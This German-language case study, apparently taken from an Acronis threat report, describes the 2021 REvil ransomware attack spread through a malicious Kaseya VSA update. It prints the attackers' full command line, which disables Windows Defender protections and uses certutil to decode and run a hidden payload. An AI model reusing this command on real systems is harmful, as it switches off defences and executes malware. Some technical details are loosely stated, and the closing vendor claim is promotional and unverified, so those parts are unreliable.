Abstrakte Daten und Zahlen verdeutlichen die Größenordnung der Gefahr durch Cyberattacken. Die Beschreibung des Ablaufs eines ganz konkreten Einzelfalls führt jedoch wesentlich plakativer vor Augen, was im Falle eines Angriffs alles auf dem Spiel steht und wie man sich wirkungsvoll schützen kann. Im dem folgenden, dem Acronis Cyberthreats Report entnommenen Beispiel wurden als Ziel sogenannte Managed Service Provider (MSPs) ausgewählt, also IT-Dienstleister, die im Auftrag ihrer Kunden definierte Services übernehmen bzw. zur Verfügung stellen. Da ein solcher MSP im Durchschnitt die IT von rund 100 Unternehmen verwaltet, ist er für Kriminelle ein besonders attraktives Ziel: Statt 100 verschiedene Unternehmen zu kompromittieren, reicht der Hack eines einzigen MSPs, um ebenfalls Zugriff auf dessen 100 Kunden zu erlangen.
Bei der hier geschilderten Attacke gelang es der Ransomware-Gruppe REvil/Sodinokibi, über die von MSPs häufig eingesetzte IT-Verwaltungssoftware Kaseya VSA ein schädliches Update zu verbreiten und so die Systeme von Dienstleistern und Kunden mit Ransomware zu kompromittieren.
Der Ablauf
Am Abend des 2. Juli 2021 begannen die Angreifer in den Vereinigten Staaten mit der Verteilung der Ransomware. Dieser Zeitpunkt war sehr bewusst gewählt. Zum Beginn eines langen Wochenendes befinden sich in den Unternehmen in der Regel deutlich weniger Mitarbeiter, welche für eine Erkennung und Abwehr der Attacke normalerweise zur Verfügung stehen.
Ausgenutzt wurde dabei eine sogenannte Zero-Day-Schwachstelle, also ein bereits bekannter Sicherheitsfehler, der noch nicht mit einem Patch geschlossen wurde. Dieser Fehler erlaubte es den Kriminellen, unter Umgehung der Authentifizierung Zugang zum Kaseya VSA-Manager zu erhalten und eigene Befehlscodes an die verbundenen Clients zu senden.
Nachdem zunächst der Administratorzugriff auf den VSA-Manager gesperrt wurde, erfolgte die Verteilung eines schädlichen Update namens „Kaseya VSA Agent Hot-fix“ an die verbundenen Clients. Dieses Update, dessen Code im Folgenden abgebildet ist, führte mehrere PowerShell-Befehle zur Herabsetzung der lokalen Sicherheitseinstellungen aus, wobei unter anderem die Echtzeitüberwachung und die Malware-Benachrichtigungen abgeschaltet wurden:
C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 4223 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference – DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true – DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled – SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Einer der PowerShell-Befehle entschlüsselte mithilfe des legitimen Certutil-Tools von Microsoft auch die verschlüsselte Schaddatei namens „agent.crt“. Dabei wurde das Tool zunächst nach „C:\Windows\cert.exe“ kopiert, um die entschlüsselte Schaddatei „agent.exe“ dann in einem temporären Verzeichnis von Kaseya zu platzieren und mit einem Zertifikat zu signieren. Anschließend legte agent.exe als sogenannter „Dropper“ das REvil Verschlüsselungsmodul und eine alte, aber saubere Windows Defender-Binärdatei im Windows-Ordner ab. Der dann startende Windows Defender holte die Schaddaten über eine DLL-Sideloading-Schwachstelle, die Verschlüsselung begann.
Da agent.exe mit einem gültigen digitalen Zertifikat signiert war und die schädliche DLL-Datei mit einer legitimen Windows Defender-Binärdatei geladen wurde, konnten die bei vielen MSPs eingesetzten Sicherheitstools den Angriff nicht erkennen.
Ob es den Angreifern der REvil-Gruppe laut eigenen Aussagen so tatsächlich gelang, eine Million Rechner zu infizieren, kann kaum verifiziert werden. Dass sie 70 Millionen US-Dollar für ein universelles Entschlüsselungsprogramm forderten, hingegen schon.
MSPs, bei denen Acronis Cyber Protect im Einsatz war, wurden mit dieser Forderung übrigens nicht behelligt. Aufgrund der integrierten und patentierten Erkennung von Prozessinjektionen wurde das irreguläre Verhalten von Kaseya VSA sofort erkannt und die Verteilung des schädlichen Updates unterbunden.